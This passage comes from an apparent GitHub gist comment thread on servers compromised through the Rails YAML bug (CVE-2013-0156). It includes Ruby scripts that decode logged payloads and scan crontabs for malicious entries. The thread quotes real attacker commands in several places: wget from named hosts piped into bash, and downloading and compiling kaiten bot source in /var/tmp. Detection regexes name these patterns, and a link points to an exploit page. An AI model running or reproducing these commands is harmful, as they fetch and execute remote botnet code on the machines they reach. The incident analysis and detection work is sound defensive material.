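    Base64.decode64(b64).b.scan(SYSTEM_CALL).map { |_quote, cmd| cmd }
  end
end

# The YAML in back_url was URL-encoded twice, so the single decode the web
# stack performs still leaves an opaque-looking string; undo both layers,
# exactly as the commenter did with two CGI.unescape calls.
def commands_from_access_log_path(path)
  extract_commands(CGI.unescape(CGI.unescape(path)))
end

# Rails had already decoded the parameter once before logging it, so the
# eval(%[...]) wrapper is visible in the log as-is.
def commands_from_rails_param(value)
  extract_commands(value)
end

if __FILE__ == $PROGRAM_NAME
  { 'nginx access log' => commands_from_access_log_path(ACCESS_LOG_PATH),
    'Rails log'        => commands_from_rails_param(RAILS_LOG_PARAM) }.each do |source, cmds|
    puts "#{source}: #{cmds.size} system() call(s) in payload"
    cmds.each { |cmd| puts "  #{cmd}" }
  end
end
```

Run it as `ruby decode_payload.rb` (any file name will do). Both inputs decode to the same three commands: wipe the crontab, install the hourly wget entry, and fetch a logging URL, which is what the base64 -d output above shows in its readable part. Pointing `extract_commands` at a whole access or Rails log file lists every such payload it carries, which is a quick way to see what an attacker tried on a server before deciding whether it needs the rebuild recommended further down the thread.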

It's one of the stable ones, sorry I can't check now.

Ruby version: 1.9.3-p327
Rails version: 3.2

Hi there!

I've disconnected my server until I find a solution.. and I believe I have it:

chmod 700 /usr/bin/wget

=> http://forums.cpanel.net/f185/wget-abuse-hack-340232.html
This is a recent thread.. so I will test it tonight..

More searching on the subject, it seems to be this exploit:

http://1337day.com/exploit/20596

After doing the chmod on wget, I receive another log from my server:

/bin/sh: wget: Permission denied
/bin/sh: wget: Permission denied
/bin/sh: wget: Permission denied

Don't forget to vi /var/spool/cron/crontabs/www-data
and delete the line about wget.

Last information:

I'm running Rails 3.2.3 with ruby 1.9.2p320 (2012-04-20 revision 35421) [i686-linux]
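The crontab cleanup above is done by hand in vi. As an added example (not code from this gist or any commenter), here is a small Ruby check that flags the crontab entry shapes quoted in this thread: a download piped straight into a shell, a download into /tmp or /var/tmp, a binary run from there, and a source file compiled on the box. The sample crontab is constructed: one legitimate backup entry plus the three malicious command lines copied from comments above, given the hourly `1 * * * *` schedule that appears in the thread. The indicator names and regexes are my own. Note that `chmod 700 /usr/bin/wget` only breaks this particular payload's downloader; it does not close the hole the request came through, so a hit from this check is a reason to rebuild, not just to edit the crontab.

```ruby
# Constructed sample crontab: line 2 is a normal backup job, lines 3-5 are
# the three malicious entries quoted by commenters in this thread.
SAMPLE_CRONTAB = <<~CRON
  # m h dom mon dow command
  0 3 * * * /usr/local/bin/backup.sh >> /var/log/backup.log 2>&1
  1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;
  1 * * * * wget -O /var/tmp/k colkolduld.com/req/work.php && chmod +x /var/tmp/k && /var/tmp/k
  1 * * * * wget -O /var/tmp/k.c 188.190.124.120/kaiten-src.c && gcc -o /var/tmp/ka /var/tmp/k.c && chmod +x /var/tmp/ka && /var/tmp/ka
CRON

# Each indicator is a behaviour seen in the payloads above, not a domain or
# IP, so the check still fires when the attacker rotates hosts.
INDICATORS = {
  'download piped straight into a shell'           => /\b(wget|curl)\b[^|]*\|\s*(ba)?sh\b/,
  'executes a file from a world-writable temp dir' => %r{(^|[\s;&|])/(var/)?tmp/\S+},
  'downloads into a temp dir'                      => %r{\b(wget|curl)\b.*-[oO]\s*/(var/)?tmp/},
  'compiles a just-downloaded source file'         => %r{\bgcc\b.*-o\s*/(var/)?tmp/},
}.freeze

# Return one finding per suspicious crontab line: its 1-based line number,
# the indicator names that matched, and the entry itself. Comments and blank
# lines are skipped so a commented-out entry never counts.
def suspicious_cron_entries(crontab_text)
  findings = []
  crontab_text.each_line.with_index(1) do |line, number|
    entry = line.strip
    next if entry.empty? || entry.start_with?('#')
    hits = INDICATORS.select { |_, re| entry.match?(re) }.keys
    findings << { line: number, indicators: hits, entry: entry } unless hits.empty?
  end
  findings
end

if __FILE__ == $PROGRAM_NAME
  # Feed it a real crontab with: crontab -l -u www-data | ruby cron_check.rb
  input = $stdin.tty? ? SAMPLE_CRONTAB : $stdin.read
  suspicious_cron_entries(input).each do |f|
    puts "line #{f[:line]}: #{f[:indicators].join(', ')}"
    puts "  #{f[:entry]}"
  end
end
```

Run with no stdin to see the constructed sample evaluated, or pipe `crontab -l -u www-data` (and `crontab -l` for every other user with a shell) into it to check a live box; the backup job produces no finding, while each of the three malicious lines is reported with the behaviours it exhibits.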

This is an exploit of an old Rails bug (CVE-2013-0156).

Clean your systems and update to 3.2.12.

In the future, make sure you subscribe to the rubyonrails-security mailing list to keep up to date with patches.

https://groups.google.com/forum/?fromgroups#!forum/rubyonrails-security

I'm building an application which will integrate with GitHub to alert you when a vulnerability is found in any of the gems that your application uses.

For this case, you would have received an alert when the Rails vulnerabilities were found, and would then have had time to update your application before an attacker got access.

Sign up to be informed when this is ready here: http://www.rubyaudit.com

The Gem::Requirements piece makes me think it's the Rails YAML parameter vulnerability from a few months ago. Even if you've updated versions, you may still be vulnerable. You can check here to see if that's the bug: https://www.tinfoilsecurity.com/railscheck

If your server has been compromised, you must rebuild from scratch - updating versions isn't enough.

It looks like it's part of a botnet, as it's using IRC.

@bu2, my server was hit (but not successfully exploited) yesterday by one of the listed IPs; 95.138.186.181. Rollbar.io seems to have caught it and logged it 6 times. The exact error is Hash::DisallowedType: Disallowed type attribute: "yaml".

You can test for vulnerable versions in applications automatically with GemCanary which can be especially helpful if you have a large number of applications and lose track of some of them from time to time. I've found it presents the various alerts in a context that's relevant to you based on your Gemfile.lock.

Wow. I think this needs some clarification. I was not who posted it to HN. This is a rather old Rails vulnerability that has since been patched and explained. It was all over the internet back in January. I updated my apps as soon as the patches were made available and none of my servers were ever successfully attacked in this way. I just spotted the backtraces in my error logs and posted the offending code here for reference.

All the comments and discussion are appreciated but I will suggest that if you were affected by this and plan to start a discussion then use your own fork and attribution. Thanks!

Hi,

And what about my configuration?

Server version: Apache/2.2.14 (Ubuntu)
Rails 3.2.3
ruby 1.9.2p320 (2012-04-20 revision 35421) [i686-linux]

No nginx, no Rails 3.2.1, no Redmine, no YAML problem, but I had the same problem detailed below:

  • k.c, k and ka files in /var/tmp (probably an IRC script)

  • a new line in my crontab executing some wget commands like this:

wget -O /var/tmp/k.c 188.190.124.120/kaiten-src.c && gcc -o /var/tmp/ka /var/tmp/k.c && chmod +x /var/tmp/ka && /var/tmp/ka

wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O -

wget -O /var/tmp/k colkolduld.com/req/work.php && chmod +x /var/tmp/k && /var/tmp/k

I did not find any suspect trace in my Apache log, but there were some actions under fail2ban (I didn't look deeper at it since the chmod and the www-data cron update resolved my problem as described above).

I'm still searching how the malicious scripts were uploaded to my server ...
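The recurring indicator in this thread is a crontab entry that fetches remote content with wget and pipes it straight into bash, or drops a binary under /var/tmp and executes it. The following Ruby script is an added example (not code from the gist or from any commenter) that scans a crontab dump for exactly those two patterns, so a defender can audit every user's crontab (e.g. the output of `crontab -l -u www-data`) instead of eyeballing it. The sample crontab is constructed for the example; the hostnames in it are the ones quoted in this thread, and `example.invalid` is a placeholder.

```ruby
# Added example: flag crontab entries that download and execute remote content.
# Not part of the original gist; sample data below is constructed.

# Constructed crontab, modelled on the entries quoted in this thread.
SAMPLE_CRONTAB = <<~CRON
  # m h dom mon dow command
  0 3 * * * /usr/local/bin/backup.sh
  1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash
  */5 * * * * curl -s http://example.invalid/x.sh | sh
  30 6 * * * wget -O /var/tmp/k colkolduld.com/req/work.php && chmod +x /var/tmp/k && /var/tmp/k
  @daily /usr/bin/certbot renew --quiet
CRON

# A download tool appears in the command.
DOWNLOADERS   = /\b(?:wget|curl|fetch)\b/
# Output is piped into a shell interpreter (bash, sh, zsh, dash).
PIPE_TO_SHELL = /\|\s*(?:ba|z|da)?sh\b/
# Something under /tmp or /var/tmp is made executable or executed afterwards.
TMP_EXEC      = %r{(?:/var)?/tmp/\S+.*(?:chmod\s+\+x|&&\s*(?:/var)?/tmp/)}

# Returns one hash per suspicious entry: line number, command text and
# the list of reasons it was flagged. Comments and blank lines are skipped.
def suspicious_cron_entries(text)
  hits = []
  text.each_line.with_index(1) do |raw, no|
    line = raw.strip
    next if line.empty? || line.start_with?('#')

    # Either "@reboot cmd" style (two fields) or the five schedule fields
    # followed by the command; everything after them is the command.
    command = if line.start_with?('@')
                line.split(/\s+/, 2).last
              else
                line.split(/\s+/, 6).last
              end

    reasons = []
    reasons << 'downloads and pipes to shell'     if command =~ DOWNLOADERS && command =~ PIPE_TO_SHELL
    reasons << 'downloads into /tmp and executes' if command =~ DOWNLOADERS && command =~ TMP_EXEC
    next if reasons.empty?

    hits << { line: no, command: command, reasons: reasons }
  end
  hits
end

if __FILE__ == $PROGRAM_NAME
  # Run directly: read a crontab dump from stdin, or fall back to the sample.
  input = $stdin.tty? ? SAMPLE_CRONTAB : $stdin.read
  suspicious_cron_entries(input).each do |h|
    puts "line #{h[:line]}: #{h[:reasons].join(', ')}"
    puts "    #{h[:command]}"
  end
end
```

Feed it real data with `crontab -l -u www-data | ruby cron_audit.rb`; the two patterns are deliberately narrow so that legitimate jobs such as backups or certificate renewals (lines 2 and 6 of the sample) are not reported. Finding a hit is a signal to rebuild, as several commenters note, not merely to delete the line.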

Hi,

My server was infected too, should I do a reinstall? Or should removing the files and upgrading Rails be enough?

My server was infected too, should I do a reinstall?

Definitely.

@Netmisa : I've since uninstalled PhpMyAdmin from my server, but I was using one installed by apt-get -- 3.4.5-1.

OK, anyway we know now where the problem comes from.

